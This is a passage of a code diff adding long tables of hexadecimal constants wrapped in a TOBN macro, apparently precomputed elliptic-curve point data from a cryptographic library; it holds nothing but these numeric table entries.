+     TOBN(0x1ac98691, 0xc234296f), TOBN(0x2a0a83a4, 0x94887fb6),
+     TOBN(0x56511427, 0x0cea9cf2), TOBN(0x5230a6e8, 0xa24802f5),
+     TOBN(0xf7a2bf0f, 0x72e3d5c1), TOBN(0x37717446, 0x4f21439e),
+     TOBN(0xfedcbf25, 0x9ce30334), TOBN(0xe0030a78, 0x7ce202f9),
+     TOBN(0x6f2d9ebf, 0x1202e9ca), TOBN(0xe79dde6c, 0x75e6e591),
+     TOBN(0xf52072af, 0xf1dac4f8), TOBN(0x6c8d087e, 0xbb9b404d),
+     TOBN(0xad0fc73d, 0xbce913af), TOBN(0x909e587b, 0x458a07cb),
+     TOBN(0x1300da84, 0xd4f00c8a), TOBN(0x425cd048, 0xb54466ac),
+     TOBN(0xb59cb9be, 0x90e9d8bf), TOBN(0x991616db, 0x3e431b0e),
+     TOBN(0xd3aa117a, 0x531aecff), TOBN(0x91af92d3, 0x59f4dc3b),
+     TOBN(0x9b1ec292, 0xe93fda29), TOBN(0x76bb6c17, 0xe97d91bc),
+     TOBN(0x7509d95f, 0xaface1e6), TOBN(0x3653fe47, 0xbe855ae3),
+     TOBN(0x73180b28, 0x0f680e75), TOBN(0x75eefd1b, 0xeeb6c26c),
+     TOBN(0xa4cdf29f, 0xb66d4236), TOBN(0x2d70a997, 0x6b5821d8),
+     TOBN(0x7a3ee207, 0x20445c36), TOBN(0x71d1ac82, 0x59877174),
+     TOBN(0x0fc539f7, 0x949f73e9), TOBN(0xd05cf3d7, 0x982e3081),
+     TOBN(0x8758e20b, 0x7b1c7129), TOBN(0xffadcc20, 0x569e61f2),
+     TOBN(0xb05d3a2f, 0x59544c2d), TOBN(0xbe16f5c1, 0x9fff5e53),
+     TOBN(0x73cf65b8, 0xaad58135), TOBN(0x622c2119, 0x037aa5be),
+     TOBN(0x79373b3f, 0x646fd6a0), TOBN(0x0e029db5, 0x0d3978cf),
+     TOBN(0x8bdfc437, 0x94fba037), TOBN(0xaefbd687, 0x620797a6),
+     TOBN(0x3fa5382b, 0xbd30d38e), TOBN(0x7627cfbf, 0x585d7464),
+     TOBN(0xb2330fef, 0x4e4ca463), TOBN(0xbcef7287, 0x3566cc63),
+     TOBN(0xd161d2ca, 0xcf780900), TOBN(0x135dc539, 0x5b54827d),
+     TOBN(0x638f052e, 0x27bf1bc6), TOBN(0x10a224f0, 0x07dfa06c),
+     TOBN(0xe973586d, 0x6d3321da), TOBN(0x8b0c5738, 0x26152c8f),
+     TOBN(0x07ef4f2a, 0x34606074), TOBN(0x80fe7fe8, 0xa0f7047a),
+     TOBN(0x3d1a8152, 0xe1a0e306), TOBN(0x32cf43d8, 0x88da5222),
+     TOBN(0xbf89a95f, 0x5f02ffe6), TOBN(0x3d9eb9a4, 0x806ad3ea),
+     TOBN(0x012c17bb, 0x79c8e55e), TOBN(0xfdcd1a74, 0x99c81dac),
+     TOBN(0x7043178b, 0xb9556098), TOBN(0x4090a1df, 0x801c3886),
+     TOBN(0x759800ff, 0x9b67b912), TOBN(0x3e5c0304, 0x232620c8),
+     TOBN(0x4b9d3c4b, 0x70dceeca), TOBN(0xbb2d3c15, 0x181f648e),
+     TOBN(0xf981d837, 0x6e33345c), TOBN(0xb626289b, 0x0cf2297a),
+     TOBN(0x766ac659, 0x8baebdcf), TOBN(0x1a28ae09, 0x75df01e5),
+     TOBN(0xb71283da, 0x375876d8), TOBN(0x4865a96d, 0x607b9800),
+     TOBN(0x25dd1bcd, 0x237936b2), TOBN(0x332f4f4b, 0x60417494),
+     TOBN(0xd0923d68, 0x370a2147), TOBN(0x497f5dfb, 0xdc842203),
+     TOBN(0x9dc74cbd, 0x32be5e0f), TOBN(0x7475bcb7, 0x17a01375),
+     TOBN(0x438477c9, 0x50d872b1), TOBN(0xcec67879, 0xffe1d63d),
+     TOBN(0x9b006014, 0xd8578c70), TOBN(0xc9ad99a8, 0x78bb6b8b),
+     TOBN(0x6799008e, 0x11fb3806), TOBN(0xcfe81435, 0xcd44cab3),
+     TOBN(0xa2ee1582, 0x2f4fb344), TOBN(0xb8823450, 0x483fa6eb),
+     TOBN(0x622d323d, 0x652c7749), TOBN(0xd8474a98, 0xbeb0a15b),
+     TOBN(0xe43c154d, 0x5d1c00d0), TOBN(0x7fd581d9, 0x0e3e7aac),
+     TOBN(0x2b44c619, 0x2525ddf8), TOBN(0x67a033eb, 0xb8ae9739),
+     TOBN(0x113ffec1, 0x9ef2d2e4), TOBN(0x1bf6767e, 0xd5a0ea7f),
+     TOBN(0x57fff75e, 0x03714c0a), TOBN(0xa23c422e, 0x0a23e9ee),
+     TOBN(0xdd5f6b2d, 0x540f83af), TOBN(0xc2c2c27e, 0x55ea46a7),
+     TOBN(0xeb6b4246, 0x672a1208), TOBN(0xd13599f7, 0xae634f7a),
+     TOBN(0xcf914b5c, 0xd7b32c6e), TOBN(0x61a5a640, 0xeaf61814),
+     TOBN(0x8dc3df8b, 0x208a1bbb), TOBN(0xef627fd6, 0xb6d79aa5),
+     TOBN(0x44232ffc, 0xc4c86bc8), TOBN(0xe6f9231b, 0x061539fe),
+     TOBN(0x1d04f25a, 0x958b9533), TOBN(0x180cf934, 0x49e8c885),
+     TOBN(0x89689595, 0x9884aaf7), TOBN(0xb1959be3, 0x07b348a6),
+     TOBN(0x96250e57, 0x3c147c87), TOBN(0xae0efb3a, 0xdd0c61f8),
+     TOBN(0xed00745e, 0xca8c325e), TOBN(0x3c911696, 0xecff3f70),
+     TOBN(0x73acbc65, 0x319ad41d), TOBN(0x7b01a020, 0xf0b1c7ef),
+     TOBN(0xea32b293, 0x63a1483f), TOBN(0x89eabe71, 0x7a248f96),
+     TOBN(0x9c6231d3, 0x343157e5), TOBN(0x93a375e5, 0xdf3c546d),
+     TOBN(0xe76e9343, 0x6a2afe69), TOBN(0xc4f89100, 0xe166c88e),
+     TOBN(0x248efd0d, 0x4f872093), TOBN(0xae0eb3ea, 0x8fe0ea61),
+     TOBN(0xaf89790d, 0x9d79046e), TOBN(0x4d650f2d, 0x6cee0976),
+     TOBN(0xa3935d9a, 0x43071eca), TOBN(0x66fcd2c9, 0x283b0bfe),
+     TOBN(0x0e665eb5, 0x696605f1), TOBN(0xe77e5d07, 0xa54cd38d),
+     TOBN(0x90ee050a, 0x43d950cf), TOBN(0x86ddebda, 0xd32e69b5),
+     TOBN(0x6ad94a3d, 0xfddf7415), TOBN(0xf7fa1309, 0x3f6e8d5a),
+     TOBN(0xc4831d1d, 0xe9957f75), TOBN(0x7de28501, 0xd5817447),
+     TOBN(0x6f1d7078, 0x9e2aeb6b), TOBN(0xba2b9ff4, 0xf67a53c2),
+     TOBN(0x36963767, 0xdf9defc3), TOBN(0x479deed3, 0x0d38022c),
+     TOBN(0xd2edb89b, 0x3a8631e8), TOBN(0x8de855de, 0x7a213746),
+     TOBN(0xb2056cb7, 0xb00c5f11), TOBN(0xdeaefbd0, 0x2c9b85e4),
+     TOBN(0x03f39a8d, 0xd150892d), TOBN(0x37b84686, 0x218b7985),
+     TOBN(0x36296dd8, 0xb7375f1a), TOBN(0x472cd4b1, 0xb78e898e),
+     TOBN(0x15dff651, 0xe9f05de9), TOBN(0xd4045069, 0x2ce98ba9),
+     TOBN(0x8466a7ae, 0x9b38024c), TOBN(0xb910e700, 0xe5a6b5ef),
+     TOBN(0xae1c56ea, 0xb3aa8f0d), TOBN(0xbab2a507, 0x7eee74a6),
+     TOBN(0x0dca11e2, 0x4b4c4620), TOBN(0xfd896e2e, 0x4c47d1f4),
+     TOBN(0xeb45ae53, 0x308fbd93), TOBN(0x46cd5a2e, 0x02c36fda),
+     TOBN(0x6a3d4e90, 0xbaa48385), TOBN(0xdd55e62e, 0x9dbe9960),
+     TOBN(0xa1406aa0, 0x2a81ede7), TOBN(0x6860dd14, 0xf9274ea7),
+     TOBN(0xcfdcb0c2, 0x80414f86), TOBN(0xff410b10, 0x22f94327),
+     TOBN(0x5a33cc38, 0x49ad467b), TOBN(0xefb48b6c, 0x0a7335f1),
+     TOBN(0x14fb54a4, 0xb153a360), TOBN(0x604aa9d2, 0xb52469cc),
+     TOBN(0x5e9dc486, 0x754e48e9), TOBN(0x693cb455, 0x37471e8e),
+     TOBN(0xfb2fd7cd, 0x8d3b37b6), TOBN(0x63345e16, 0xcf09ff07),
+     TOBN(0x9910ba6b, 0x23a5d896), TOBN(0x1fe19e35, 0x7fe4364e),
+     TOBN(0x6e1da8c3, 0x9a33c677), TOBN(0x15b4488b, 0x29fd9fd0),
+     TOBN(0x1f439254, 0x1a1f22bf), TOBN(0x920a8a70, 0xab8163e8),
+     TOBN(0x3fd1b249, 0x07e5658e), TOBN(0xf2c4f79c, 0xb6ec839b),
+     TOBN(0x1abbc3d0, 0x4aa38d1b), TOBN(0x3b0db35c, 0xb5d9510e),
+     TOBN(0x1754ac78, 0x3e60dec0), TOBN(0x53272fd7, 0xea099b33),
+     TOBN(0x5fb0494f, 0x07a8e107), TOBN(0x4a89e137, 0x6a8191fa),
+     TOBN(0xa113b7f6, 0x3c4ad544), TOBN(0x88a2e909, 0x6cb9897b),
+     TOBN(0x17d55de3, 0xb44a3f84), TOBN(0xacb2f344, 0x17c6c690),
+     TOBN(0x32088168, 0x10232390), TOBN(0xf2e8a61f, 0x6c733bf7),
+     TOBN(0xa774aab6, 0x9c2d7652), TOBN(0xfb5307e3, 0xed95c5bc),
+     TOBN(0xa05c73c2, 0x4981f110), TOBN(0x1baae31c, 0xa39458c9),
+     TOBN(0x1def185b, 0xcbea62e7), TOBN(0xe8ac9eae, 0xeaf63059),
+     TOBN(0x098a8cfd, 0x9921851c), TOBN(0xd959c3f1, 0x3abe2f5b),
+     TOBN(0xa4f19525, 0x20e40ae5), TOBN(0x320789e3, 0x07a24aa1),
+     TOBN(0x259e6927, 0x7392b2bc), TOBN(0x58f6c667, 0x1918668b),
+     TOBN(0xce1db2bb, 0xc55d2d8b), TOBN(0x41d58bb7, 0xf4f6ca56),
+     TOBN(0x7650b680, 0x8f877614), TOBN(0x905e16ba, 0xf4c349ed),
+     TOBN(0xed415140, 0xf661acac), TOBN(0x3b8784f0, 0xcb2270af),
+     TOBN(0x3bc280ac, 0x8a402cba), TOBN(0xd53f7146, 0x0937921a),
+     TOBN(0xc03c8ee5, 0xe5681e83), TOBN(0x62126105, 0xf6ac9e4a),
+     TOBN(0x9503a53f, 0x936b1a38), TOBN(0x3d45e2d4, 0x782fecbd),
+     TOBN(0x69a5c439, 0x76e8ae98), TOBN(0xb53b2eeb, 0xbfb4b00e),
+     TOBN(0xf1674712, 0x72386c89), TOBN(0x30ca34a2, 0x4268bce4),
+     TOBN(0x7f1ed86c, 0x78341730), TOBN(0x8ef5beb8, 0xb525e248),
+     TOBN(0xbbc489fd, 0xb74fbf38), TOBN(0x38a92a0e, 0x91a0b382),
+     TOBN(0x7a77ba3f, 0x22433ccf), TOBN(0xde8362d6, 0xa29f05a9),
+     TOBN(0x7f6a30ea, 0x61189afc), TOBN(0x693b5505, 0x59ef114f),
+     TOBN(0x50266bc0, 0xcd1797a1), TOBN(0xea17b47e, 0xf4b7af2d),
+     TOBN(0xd6c4025c, 0x3df9483e), TOBN(0x8cbb9d9f, 0xa37b18c9),
+     TOBN(0x91cbfd9c, 0x4d8424cf), TOBN(0xdb7048f1, 0xab1c3506),
+     TOBN(0x9eaf641f, 0x028206a3), TOBN(0xf986f3f9, 0x25bdf6ce),
+     TOBN(0x262143b5, 0x224c08dc), TOBN(0x2bbb09b4, 0x81b50c91),
+     TOBN(0xc16ed709, 0xaca8c84f), TOBN(0xa6210d9d, 0xb2850ca8),
+     TOBN(0x6d8df67a, 0x09cb54d6), TOBN(0x91eef6e0, 0x500919a4),
+     TOBN(0x90f61381, 0x0f132857), TOBN(0x9acede47, 0xf8d5028b),
+     TOBN(0x844d1b71, 0x90b771c3), TOBN(0x563b71e4, 0xba6426be),
+     TOBN(0x2efa2e83, 0xbdb802ff), TOBN(0x3410cbab, 0xab5b4a41),
+     TOBN(0x555b2d26, 0x30da84dd), TOBN(0xd0711ae9, 0xee1cc29a),
+     TOBN(0xcf3e8c60, 0x2f547792), TOBN(0x03d7d5de, 0xdc678b35),
+     TOBN(0x071a2fa8, 0xced806b8), TOBN(0x222e6134, 0x697f1478),
+     TOBN(0xdc16fd5d, 0xabfcdbbf), TOBN(0x44912ebf, 0x121b53b8),
+     TOBN(0xac943674, 0x2496c27c), TOBN(0x8ea3176c, 0x1ffc26b0),
+     TOBN(0xb6e224ac, 0x13debf2c), TOBN(0x524cc235, 0xf372a832),
+     TOBN(0xd706e1d8, 0x9f6f1b18), TOBN(0x2552f005, 0x44cce35b),
+     TOBN(0x8c8326c2, 0xa88e31fc), TOBN(0xb5468b2c, 0xf9552047),
+     TOBN(0xce683e88, 0x3ff90f2b), TOBN(0x77947bdf, 0x2f0a5423),
+     TOBN(0xd0a1b28b, 0xed56e328), TOBN(0xaee35253, 0xc20134ac),
+     TOBN(0x7e98367d, 0x3567962f), TOBN(0x379ed61f, 0x8188bffb),
+     TOBN(0x73bba348, 0xfaf130a1), TOBN(0x6c1f75e1, 0x904ed734),
+     TOBN(0x18956642, 0x3b4a79fc), TOBN(0xf20bc83d, 0x54ef4493),
+     TOBN(0x836d425d, 0x9111eca1), TOBN(0xe5b5c318, 0x009a8dcf),
+     TOBN(0x3360b25d, 0x13221bc5), TOBN(0x707baad2, 0x6b3eeaf7),
+     TOBN(0xd7279ed8, 0x743a95a1), TOBN(0x7450a875, 0x969e809f),
+     TOBN(0x32b6bd53, 0xe5d0338f), TOBN(0x1e77f7af, 0x2b883bbc),
+     TOBN(0x90da12cc, 0x1063ecd0), TOBN(0xe2697b58, 0xc315be47),
+     TOBN(0x2771a5bd, 0xda85d534), TOBN(0x53e78c1f, 0xff980eea),
+     TOBN(0xadf1cf84, 0x900385e7), TOBN(0x7d3b14f6, 0xc9387b62),
+     TOBN(0x170e74b0, 0xcb8f2bd2), TOBN(0x2d50b486, 0x827fa993),
+     TOBN(0xcdbe8c9a, 0xf6f32bab), TOBN(0x55e906b0, 0xc3b93ab8),
+     TOBN(0x747f22fc, 0x8fe280d1), TOBN(0xcd8e0de5, 0xb2e114ab),
+     TOBN(0x5ab7dbeb, 0xe10b68b0), TOBN(0x9dc63a9c, 0xa480d4b2),
+     TOBN(0x78d4bc3b, 0x4be1495f), TOBN(0x25eb3db8, 0x9359122d),
+     TOBN(0x3f8ac05b, 0x0809cbdc), TOBN(0xbf4187bb, 0xd37c702f),
+     TOBN(0x84cea069, 0x1416a6a5), TOBN(0x8f860c79, 0x43ef881c),
+     TOBN(0x41311f8a, 0x38038a5d), TOBN(0xe78c2ec0, 0xfc612067),
+     TOBN(0x494d2e81, 0x5ad73581), TOBN(0xb4cc9e00, 0x59604097),
+     TOBN(0xff558aec, 0xf3612cba), TOBN(0x35beef7a, 0x9e36c39e),
+     TOBN(0x1845c7cf, 0xdbcf41b9), TOBN(0x5703662a, 0xaea997c0),
+     TOBN(0x8b925afe, 0xe402f6d8), TOBN(0xd0a1b1ae, 0x4dd72162),
+     TOBN(0x9f47b375, 0x03c41c4b), TOBN(0xa023829b, 0x0391d042),
+     TOBN(0x5f5045c3, 0x503b8b0a), TOBN(0x123c2688, 0x98c010e5),
+     TOBN(0x324ec0cc, 0x36ba06ee), TOBN(0xface3115, 0x3dd2cc0c),
+     TOBN(0xb364f3be, 0xf333e91f), TOBN(0xef8aff73, 0x28e832b0),
+     TOBN(0x1e9bad04, 0x2d05841b), TOBN(0x42f0e3df, 0x356a21e2),
+     TOBN(0xa3270bcb, 0x4add627e), TOBN(0xb09a8158, 0xd322e711),
+     TOBN(0x86e326a1, 0x0fee104a), TOBN(0xad7788f8, 0x3703f65d),
+     TOBN(0x7e765430, 0x47bc4833), TOBN(0x6cee582b, 0x2b9b893a),
+     TOBN(0x9cd2a167, 0xe8f55a7b), TOBN(0xefbee3c6, 0xd9e4190d),
+     TOBN(0x33ee7185, 0xd40c2e9d), TOBN(0x844cc9c5, 0xa380b548),
+     TOBN(0x323f8ecd, 0x66926e04), TOBN(0x0001e38f, 0x8110c1ba),
+     TOBN(0x8dbcac12, 0xfc6a7f07), TOBN(0xd65e1d58, 0x0cec0827),
+     TOBN(0xd2cd4141, 0xbe76ca2d), TOBN(0x7895cf5c, 0xe892f33a),
+     TOBN(0x956d230d, 0x367139d2), TOBN(0xa91abd3e, 0xd012c4c1),
+     TOBN(0x34fa4883, 0x87eb36bf), TOBN(0xc5f07102, 0x914b8fb4),
+     TOBN(0x90f0e579, 0xadb9c95f), TOBN(0xfe6ea8cb, 0x28888195),
+     TOBN(0x7b9b5065, 0xedfa9284), TOBN(0x6c510bd2, 0x2b8c8d65),
+     TOBN(0xd7b8ebef, 0xcbe8aafd), TOBN(0xedb3af98, 0x96b1da07),
+     TOBN(0x28ff779d, 0x6295d426), TOBN(0x0c4f6ac7, 0x3fa3ad7b),
+     TOBN(0xec44d054, 0x8b8e2604), TOBN(0x9b32a66d, 0x8b0050e1),
+     TOBN(0x1f943366, 0xf0476ce2), TOBN(0x7554d953, 0xa602c7b4),
+     TOBN(0xbe35aca6, 0x524f2809), TOBN(0xb6881229, 0xfd4edbea),
+     TOBN(0xe8cd0c8f, 0x508efb63), TOBN(0x9eb5b5c8, 0x6abcefc7),
+     TOBN(0xf5621f5f, 0xb441ab4f), TOBN(0x79e6c046, 0xb76a2b22),
+     TOBN(0x74a4792c, 0xe37a1f69), TOBN(0xcbd252cb, 0x03542b60),
+     TOBN(0x785f65d5, 0xb3c20bd3), TOBN(0x8dea6143, 0x4fabc60c),
+     TOBN(0x45e21446, 0xde673629), TOBN(0x57f7aa1e, 0x703c2d21),
+     TOBN(0xa0e99b7f, 0x98c868c7), TOBN(0x4e42f66d, 0x8b641676),
+     TOBN(0x602884dc, 0x91077896), TOBN(0xa0d690cf, 0xc2c9885b),
+     TOBN(0xfeb4da33, 0x3b9a5187), TOBN(0x5f789598, 0x153c87ee),
+     TOBN(0x2192dd47, 0x52b16dba), TOBN(0xdeefc0e6, 0x3524c1b1),
+     TOBN(0x465ea76e, 0xe4383693), TOBN(0x79401711, 0x361b8d98),
+     TOBN(0xa5f9ace9, 0xf21a15cb), TOBN(0x73d26163, 0xefee9aeb),
+     TOBN(0xcca844b3, 0xe677016c), TOBN(0x6c122b07, 0x57eaee06),
+     TOBN(0xb782dce7, 0x15f09690), TOBN(0x508b9b12, 0x2dfc0fc9),
+     TOBN(0x9015ab4b, 0x65d89fc6), TOBN(0x5e79dab7, 0xd6d5bb0f),
+     TOBN(0x64f021f0, 0x6c775aa2), TOBN(0xdf09d8cc, 0x37c7eca1),
+     TOBN(0x9a761367, 0xef2fa506), TOBN(0xed4ca476, 0x5b81eec6),
+     TOBN(0x262ede36, 0x10bbb8b5), TOBN(0x0737ce83, 0x0641ada3),
+     TOBN(0x4c94288a, 0xe9831ccc), TOBN(0x487fc1ce, 0x8065e635),
+     TOBN(0xb13d7ab3, 0xb8bb3659), TOBN(0xdea5df3e, 0x855e4120),
+     TOBN(0xb9a18573, 0x85eb0244), TOBN(0x1a1b8ea3, 0xa7cfe0a3),
+     TOBN(0x3b837119, 0x67b0867c), TOBN(0x8d5e0d08, 0x9d364520),
+     TOBN(0x52dccc1e, 0xd930f0e3), TOBN(0xefbbcec7, 0xbf20bbaf),
+     TOBN(0x99cffcab, 0x0263ad10), TOBN(0xd8199e6d, 0xfcd18f8a),
+     TOBN(0x64e2773f, 0xe9f10617), TOBN(0x0079e8e1, 0x08704848),
+     TOBN(0x1169989f, 0x8a342283), TOBN(0x8097799c, 0xa83012e6),
+     TOBN(0xece966cb, 0x8a6a9001), TOBN(0x93b3afef, 0x072ac7fc),
+     TOBN(0xe6893a2a, 0x2db3d5ba), TOBN(0x263dc462, 0x89bf4fdc),
+     TOBN(0x8852dfc9, 0xe0396673), TOBN(0x7ac70895, 0x3af362b6),
+     TOBN(0xbb9cce4d, 0x5c2f342b), TOBN(0xbf80907a, 0xb52d7aae),
+     TOBN(0x97f3d3cd, 0x2161bcd0), TOBN(0xb25b0834, 0x0962744d),
+     TOBN(0xc5b18ea5, 0x6c3a1dda), TOBN(0xfe4ec7eb, 0x06c92317),
+     TOBN(0xb787b890, 0xad1c4afe), TOBN(0xdccd9a92, 0x0ede801a),
+     TOBN(0x9ac6ddda, 0xdb58da1f), TOBN(0x22bbc12f, 0xb8cae6ee),
+     TOBN(0xc6f8bced, 0x815c4a43), TOBN(0x8105a92c, 0xf96480c7),
+     TOBN(0x0dc3dbf3, 0x7a859d51), TOBN(0xe3ec7ce6, 0x3041196b),
+     TOBN(0xd9f64b25, 0x0d1067c9), TOBN(0xf2321321, 0x3d1f8dd8),
+     TOBN(0x8b5c619c, 0x76497ee8), TOBN(0x5d2b0ac6, 0xc717370e),
+     TOBN(0x98204cb6, 0x4fcf68e1), TOBN(0x0bdec211, 0x62bc6792),
+     TOBN(0x6973ccef, 0xa63b1011), TOBN(0xf9e3fa97, 0xe0de1ac5),
+     TOBN(0x5efb693e, 0x3d0e0c8b), TOBN(0x037248e9, 0xd2d4fcb4),}
+    ,
+    {TOBN(0x80802dc9, 0x1ec34f9e), TOBN(0xd8772d35, 0x33810603),
+     TOBN(0x3f06d66c, 0x530cb4f3), TOBN(0x7be5ed0d, 0xc475c129),
+     TOBN(0xcb9e3c19, 0x31e82b10), TOBN(0xc63d2857, 0xc9ff6b4c),
+     TOBN(0xb92118c6, 0x92a1b45e), TOBN(0x0aec4414, 0x7285bbca),
+     TOBN(0xfc189ae7, 0x1e29a3ef), TOBN(0xcbe906f0, 0x4c93302e),
+     TOBN(0xd0107914, 0xceaae10e), TOBN(0xb7a23f34, 0xb68e19f8),
+     TOBN(0xe9d875c2, 0xefd2119d), TOBN(0x03198c6e, 0xfcadc9c8),
+     TOBN(0x65591bf6, 0x4da17113), TOBN(0x3cf0bbf8, 0x3d443038),
+     TOBN(0xae485bb7, 0x2b724759), TOBN(0x945353e1, 0xb2d4c63a),
+     TOBN(0x82159d07, 0xde7d6f2c), TOBN(0x389caef3, 0x4ec5b109),
+     TOBN(0x4a8ebb53, 0xdb65ef14), TOBN(0x2dc2cb7e, 0xdd99de43),
+     TOBN(0x816fa3ed, 0x83f2405f), TOBN(0x73429bb9, 0xc14208a3),
+     TOBN(0xb618d590, 0xb01e6e27), TOBN(0x047e2ccd, 0xe180b2dc),
+     TOBN(0xd1b299b5, 0x04aea4a9), TOBN(0x412c9e1e, 0x9fa403a4),
+     TOBN(0x88d28a36, 0x79407552), TOBN(0x49c50136, 0xf332b8e3),
+     TOBN(0x3a1b6fcc, 0xe668de19), TOBN(0x178851bc, 0x75122b97),
+     TOBN(0xb1e13752, 0xfb85fa4c), TOBN(0xd61257ce, 0x383c8ce9),
+     TOBN(0xd43da670, 0xd2f74dae), TOBN(0xa35aa23f, 0xbf846bbb),
+     TOBN(0x5e74235d, 0x4421fc83), TOBN(0xf6df8ee0, 0xc363473b),
+     TOBN(0x34d7f52a, 0x3c4aa158), TOBN(0x50d05aab, 0x9bc6d22e),
+     TOBN(0x8c56e735, 0xa64785f4), TOBN(0xbc56637b, 0x5f29cd07),
+     TOBN(0x53b2bb80, 0x3ee35067), TOBN(0x50235a0f, 0xdc919270),
+     TOBN(0x191ab6d8, 0xf2c4aa65), TOBN(0xc3475831, 0x8396023b),
+     TOBN(0x80400ba5, 0xf0f805ba), TOBN(0x8881065b, 0x5ec0f80f),
+     TOBN(0xc370e522, 0xcc1b5e83), TOBN(0xde2d4ad1, 0x860b8bfb),
+     TOBN(0xad364df0, 0x67b256df), TOBN(0x8f12502e, 0xe0138997),
+     TOBN(0x503fa0dc, 0x7783920a), TOBN(0xe80014ad, 0xc0bc866a),
+     TOBN(0x3f89b744, 0xd3064ba6), TOBN(0x03511dcd, 0xcba5dba5),
+     TOBN(0x197dd46d, 0x95a7b1a2), TOBN(0x9c4e7ad6, 0x3c6341fb),
+     TOBN(0x426eca29, 0x484c2ece), TOBN(0x9211e489, 0xde7f4f8a),
+     TOBN(0x14997f6e, 0xc78ef1f4), TOBN(0x2b2c0910, 0x06574586),
+     TOBN(0x17286a6e, 0x1c3eede8), TOBN(0x25f92e47, 0x0f60e018),
+     TOBN(0x805c5646, 0x31890a36), TOBN(0x703ef600, 0x57feea5b),
+     TOBN(0x389f747c, 0xaf3c3030), TOBN(0xe0e5daeb, 0x54dd3739),
+     TOBN(0xfe24a4c3, 0xc9c9f155), TOBN(0x7e4bf176, 0xb5393962),
+     TOBN(0x37183de2, 0xaf20bf29), TOBN(0x4a1bd7b5, 0xf95a8c3b),
+     TOBN(0xa83b9699, 0x46191d3d), TOBN(0x281fc8dd, 0x7b87f257),
+     TOBN(0xb18e2c13, 0x54107588), TOBN(0x6372def7, 0x9b2bafe8),
+     TOBN(0xdaf4bb48, 0x0d8972ca), TOBN(0x3f2dd4b7, 0x56167a3f),
+     TOBN(0x1eace32d, 0x84310cf4), TOBN(0xe3bcefaf, 0xe42700aa),
+     TOBN(0x5fe5691e, 0xd785e73d), TOBN(0xa5db5ab6, 0x2ea60467),
+     TOBN(0x02e23d41, 0xdfc6514a), TOBN(0x35e8048e, 0xe03c3665),
+     TOBN(0x3f8b118f, 0x1adaa0f8), TOBN(0x28ec3b45, 0x84ce1a5a),
+     TOBN(0xe8cacc6e, 0x2c6646b8), TOBN(0x1343d185, 0xdbd0e40f),
+     TOBN(0xe5d7f844, 0xcaaa358c), TOBN(0x1a1db7e4, 0x9924182a),
+     TOBN(0xd64cd42d, 0x9c875d9a), TOBN(0xb37b515f, 0x042eeec8),
+     TOBN(0x4d4dd409, 0x7b165fbe), TOBN(0xfc322ed9, 0xe206eff3),
+     TOBN(0x7dee4102, 0x59b7e17e), TOBN(0x55a481c0, 0x8236ca00),
+     TOBN(0x8c885312, 0xc23fc975), TOBN(0x15715806, 0x05d6297b),
+     TOBN(0xa078868e, 0xf78edd39), TOBN(0x956b31e0, 0x03c45e52),
+     TOBN(0x470275d5, 0xff7b33a6), TOBN(0xc8d5dc3a, 0x0c7e673f),
+     TOBN(0x419227b4, 0x7e2f2598), TOBN(0x8b37b634, 0x4c14a975),
+     TOBN(0xd0667ed6, 0x8b11888c), TOBN(0x5e0e8c3e, 0x803e25dc),
+     TOBN(0x34e5d0dc, 0xb987a24a), TOBN(0x9f40ac3b, 0xae920323),
+     TOBN(0x5463de95, 0x34e0f63a), TOBN(0xa128bf92, 0x6b6328f9),
+     TOBN(0x491ccd7c, 0xda64f1b7), TOBN(0x7ef1ec27, 0xc47bde35),
+     TOBN(0xa857240f, 0xa36a2737), TOBN(0x35dc1366, 0x63621bc1),
+     TOBN(0x7a3a6453, 0xd4fb6897), TOBN(0x80f1a439, 0xc929319d),
+     TOBN(0xfc18274b, 0xf8cb0ba0), TOBN(0xb0b53766, 0x8078c5eb),
+     TOBN(0xfb0d4924, 0x1e01d0ef), TOBN(0x50d7c67d, 0x372ab09c),
+     TOBN(0xb4e370af, 0x3aeac968), TOBN(0xe4f7fee9, 0xc4b63266),
+     TOBN(0xb4acd4c2, 0xe3ac5664), TOBN(0xf8910bd2, 0xceb38cbf),
+     TOBN(0x1c3ae50c, 0xc9c0726e), TOBN(0x15309569, 0xd97b40bf),
+     TOBN(0x70884b7f, 0xfd5a5a1b), TOBN(0x3890896a, 0xef8314cd),
+     TOBN(0x58e1515c, 0xa5618c93), TOBN(0xe665432b, 0x77d942d1),
+     TOBN(0xb32181bf, 0xb6f767a8), TOBN(0x753794e8, 0x3a604110),
+     TOBN(0x09afeb7c, 0xe8c0dbcc), TOBN(0x31e02613, 0x598673a3),
+     TOBN(0x5d98e557, 0x7d46db00), TOBN(0xfc21fb8c, 0x9d985b28),
+     TOBN(0xc9040116, 0xb0843e0b), TOBN(0x53b1b3a8, 0x69b04531),
+     TOBN(0xdd1649f0, 0x85d7d830), TOBN(0xbb3bcc87, 0xcb7427e8),
+     TOBN(0x77261100, 0xc93dce83), TOBN(0x7e79da61, 0xa1922a2a),
+     TOBN(0x587a2b02, 0xf3149ce8), TOBN(0x147e1384, 0xde92ec83),
+     TOBN(0x484c83d3, 0xaf077f30), TOBN(0xea78f844, 0x0658b53a),
+     TOBN(0x912076c2, 0x027aec53), TOBN(0xf34714e3, 0x93c8177d),
+     TOBN(0x37ef5d15, 0xc2376c84), TOBN(0x8315b659, 0x3d1aa783),
+     TOBN(0x3a75c484, 0xef852a90), TOBN(0x0ba0c58a, 0x16086bd4),
+     TOBN(0x29688d7a, 0x529a6d48), TOBN(0x9c7f250d, 0xc2f19203),
+     TOBN(0x123042fb, 0x682e2df9), TOBN(0x2b7587e7, 0xad8121bc),
+     TOBN(0x30fc0233, 0xe0182a65), TOBN(0xb82ecf87, 0xe3e1128a),
+     TOBN(0x71682861, 0x93fb098f), TOBN(0x043e21ae, 0x85e9e6a7),
+     TOBN(0xab5b49d6, 0x66c834ea), TOBN(0x3be43e18, 0x47414287),
+     TOBN(0xf40fb859, 0x219a2a47), TOBN(0x0e6559e9, 0xcc58df3c),
+     TOBN(0xfe1dfe8e, 0x0c6615b4), TOBN(0x14abc8fd, 0x56459d70),
+     TOBN(0x7be0fa8e, 0x05de0386), TOBN(0x8e63ef68, 0xe9035c7c),
+     TOBN(0x116401b4, 0x53b31e91), TOBN(0x0cba7ad4, 0x4436b4d8),
+     TOBN(0x9151f9a0, 0x107afd66), TOBN(0xafaca8d0, 0x1f0ee4c4),
+     TOBN(0x75fe5c1d, 0x9ee9761c), TOBN(0x3497a16b, 0xf0c0588f),
+     TOBN(0x3ee2bebd, 0x0304804c), TOBN(0xa8fb9a60, 0xc2c990b9),
+     TOBN(0xd14d32fe, 0x39251114), TOBN(0x36bf25bc, 0xcac73366),
